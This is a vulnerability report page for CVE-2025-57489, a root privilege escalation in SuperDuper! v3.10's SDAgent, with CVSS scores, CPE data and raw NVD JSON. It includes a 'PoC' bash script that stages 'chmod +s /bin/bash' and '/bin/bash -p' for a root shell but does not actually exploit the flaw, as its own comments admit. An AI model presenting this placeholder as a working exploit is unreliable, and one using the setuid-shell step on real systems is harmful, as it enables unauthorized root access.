Security Vulnerability Report
中文
CVE-2025-57489 CVSS 8.1 HIGH

CVE-2025-57489

Published: 2025-12-01 16:15:55
Last Modified: 2025-12-05 19:26:15

Description

Incorrect access control in the SDAgent component of Shirt Pocket SuperDuper! v3.10 allows attackers to escalate privileges to root due to the improper use of a setuid binary.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:shirt-pocket:superduper\!:3.10:*:*:*:*:*:*:* - VULNERABLE
Shirt Pocket SuperDuper! v3.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/bin/bash # CVE-2025-57489 PoC - SuperDuper! SDAgent Privilege Escalation # This is a conceptual PoC for educational purposes only TARGET="/Applications/SuperDuper!/SDAgent" EXPLOIT_SCRIPT="/tmp/exploit_$(date +%s).sh" # Create malicious payload echo '#!/bin/bash' > $EXPLOIT_SCRIPT echo '# Add malicious commands here' >> $EXPLOIT_SCRIPT echo 'chmod +s /bin/bash 2>/dev/null' >> $EXPLOIT_SCRIPT echo '/bin/bash -p' >> $EXPLOIT_SCRIPT chmod +x $EXPLOIT_SCRIPT # Attempt to trigger SDAgent vulnerability # Note: Actual exploitation requires specific conditions and may vary # Check if SDAgent is running if pgrep -x "SDAgent" > /dev/null; then echo "[+] SDAgent is running" # The actual exploitation would involve: # 1. Finding IPC endpoint used by SDAgent # 2. Crafting malicious request to trigger setuid binary misuse # 3. Gaining root shell echo "[!] This is a placeholder PoC. Real exploitation requires further analysis." else echo "[-] SDAgent is not running" fi # Cleanup rm -f $EXPLOIT_SCRIPT 2>/dev/null

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57489", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:54.800", "lastModified": "2025-12-05T19:26:15.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect access control in the SDAgent component of Shirt Pocket SuperDuper! v3.10 allows attackers to escalate privileges to root due to the improper use of a setuid binary."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shirt-pocket:superduper\\!:3.10:*:*:*:*:*:*:*", "matchCriteriaId": "07EFB125-EBF3-495C-9590-5D27C2220226"}]}]}], "references": [{"url": "http://shirt.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://shirt-pocket.com/SuperDuper/SuperDuperDescription.html", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.shirtpocket.com/blog/index.php/shadedgrey/comments/superduper_security_update_v311/", "source": "[email protected]", "tags": ["Release Notes"]}]}}